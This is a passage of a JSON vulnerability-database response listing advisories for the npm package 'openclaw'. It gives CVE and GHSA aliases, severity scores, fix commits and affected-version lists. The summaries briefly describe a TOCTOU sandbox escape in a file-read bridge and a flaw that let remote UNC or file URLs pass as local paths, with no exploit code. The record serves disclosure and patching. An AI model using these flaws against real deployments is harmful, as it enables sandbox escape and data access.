                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"
                }
            ],
            "aliases": [
                "CVE-2026-44109",
                "GHSA-xh72-v6v9-mwhc"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xsct-xjs7-nbab"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89722?format=api",
            "vulnerability_id": "VCID-xvhd-w4tv-tqhr",
            "summary": "OpenClaw: Sandbox escape via TOCTOU race in remote FS bridge readFile\n## Summary\nSandbox escape via a time-of-check to time-of-use (TOCTOU) race in the remote FS bridge `readFile`: the path check and the file read are separate steps, so the path that was checked and the file that is actually read can differ.\n\n## Current Maintainer Triage\n- Normalized severity: critical\n- Assessment: v2026.3.28 remote sandbox reads still perform the path check and then a separate file read, so the TOCTOU sandbox escape remains present in the latest shipped tag.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `121870a08583033ed6a0ed73d9ffea32991252bb` — 2026-03-31T09:55:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41296",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10948",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10981",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1099",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41296"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41296",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41296"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9p3r-hh9g-5cmg",
                    "reference_id": "GHSA-9p3r-hh9g-5cmg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9p3r-hh9g-5cmg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41296",
                "GHSA-9p3r-hh9g-5cmg"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xvhd-w4tv-tqhr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91425?format=api",
            "vulnerability_id": "VCID-xyck-sspa-4ba2",
            "summary": "OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n## Summary\nWindows local-media handling accepted remote-host file URLs and UNC-style paths before local-path validation, so network-hosted file targets could be treated as local content.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5`\n- `93880717f1cd34feaa45e74e939b7a5256288901`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/local-file-access.ts now rejects remote-host file: URLs and UNC/network paths as non-local input.\n- src/media/web-media.ts, src/media-understanding/attachments.normalize.ts, and src/agents/sandbox-paths.ts all route through the shared local-file guard.\n\nOpenClaw thanks @RacerZ-fighting, @Fushuling for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34426",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00048",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15181",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00048",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15223",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00048",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15233",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34426"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/59182",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/59182"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h3x4-hc5v-v2gm",
                    "reference_id": "GHSA-h3x4-hc5v-v2gm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h3x4-hc5v-v2gm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
